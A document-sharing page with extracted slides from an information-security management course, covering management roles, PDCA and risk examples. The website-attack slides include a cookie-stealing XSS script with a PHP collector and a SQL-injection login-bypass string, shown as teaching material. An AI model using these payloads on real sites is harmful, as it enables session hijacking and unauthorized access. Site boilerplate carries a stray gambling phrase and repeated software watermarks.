- 1、本文档共88页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
l信息安全风险及分析
没有高级管理层对安全问题的正确理解和有力支持,信息安全工作是很难正常开展的; 信息安全管理人员也应经常站在管理管理层的角度思考问题,在CISSP考试中也是这样; 信息安全管理的能力取决于公司治理水平; 信息安全管理专业人员应该有能力、有行动影响高官,帮助其形成信息安全管理的正确观念。 10:40左右结束,休息10分钟 计划是对各种活动进行规划和安排的活动和文档,通过计划进行管理的现代管理的基本方法; 自下而上是一种理想的安全管理推行模式,不过实际工作中经常是自下而上的; 从最高管理者到一般用户在计划的制定和实施过程中有各自的责任,并非都是安全专业人员在责任; 计划的制定应该有层次性,层次关系应该明确、顺畅。 风险举例: 敏感信息泄漏导致机构市场能力遭到损害的风险; 重要信息被篡改导致资金损失的风险; 信息系统设备丢失或被损坏导致财产损失的风险; 信息系统故障造成业务中断的风险; 信息资产面临的风险有很多; 信息安全管理从本质上就是对信息资产的风险进行管理,所以风险管理的概念和方法在信息安全工作中将贯彻始终,是最核心的信息安全方法。 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 技术和管理孰重孰轻的争论由来已久,从来没有停止过; 管理人员和技术人员对这个问题的错误看法严重影响信息安全工作; 举例摄影届关于两头的争论,说明人是信息安全中最关键的因素。 技术和管理孰重孰轻的争论由来已久,从来没有停止过; 管理人员和技术人员对这个问题的错误看法严重影响信息安全工作; 举例摄影届关于两头的争论,说明人是信息安全中最关键的因素。 著名的PDCA管理模型 这不仅是信息安全管理的基本方法,也是所有管理活动应遵循的方法,由此可见信息安全管理是机构管理不可分割的有机组成部分; 叙述各部分的作用和基本工作内容,说明信息安全工作是一个不断改进的工作过程,而不可能是一蹴而就的; 信息安全管理工作也应该引入能力成熟度的概念。 SQL INJECTION 针对网站的攻击 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. XSS 跨站脚本 构建了个 Javascript 脚本传递客户端的 cookie 到黑客的服务器 Javascript 脚本可以简单的这样写 var img = new Image(); img.src = ‘get_cookie.php?var=’ + encodeURI(document.cookie); 然后服务器端使用 PHP 简单写了个脚本保存 Cookie 数据 ?php if (isset($_GET[‘var’])) { ? ? file_put_contents(‘./cookie/’.time().‘.txt’, urldecode($_GET[‘var’])); } ? Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 构造SQL登陆语句 用户名: admin 密码: 1’ or ‘1’=‘1 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 其他例子 击键记录 Office文档挂栽木马 网页木马 木马捆绑 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 信息安全管理概述 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 例一: 局域网内病毒泛滥成灾。 例二: 网络中为什么会有ARP欺骗的问题发生 例三: 局域网内计算机故障频繁发生 例四: 为什么要给每个用户管理员权限 先来分析两个例子 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-20
您可能关注的文档
- I墨子的思想体系及现实意义.doc
- I增长型战略.doc
- l金融市场学作业三参考答案.doc
- I关于医师执业注册中执业范围的暂行规定.doc
- I墨家思想对中国传统文化的奠基.doc
- I墨家社会政治思想的现代意义.doc
- l金融市场与金融工具 习题.doc
- I墨本视觉探讨礼仪与人生事业成功的重要性.doc
- l金融市场学模拟试题及答案.doc
- I墨玉棚户区监理资审.doc
- 疫情环境下直播带货助力企业绩效提升了吗--基于小米公司的案例研究.pdf
- DB21_T 2888-2017公共信用信息征集规范.docx
- 智慧平安社区建设体系评价标准 __DB1304_T 353-2021.docx
- DB21_T 2973-2018小型水利工程混凝土施工质量管理规程.docx
- DB21_T 3031-2018北方寒区闸坝混凝土病害诊断、修补与防护技术规程.docx
- 基于消费者需求洞察的市场定位.pptx
- DB21∕T 3163-2019 辽宁省绿色建筑施工图设计评价规程.docx
- DB1501_T 0045-2024古树名木资源调查技术规程 .docx
- DB1309/T 208-2018桑椹设施栽培技术规程.docx
- DB13-T 5388-2021大中型水库管理规程.docx
文档评论(0)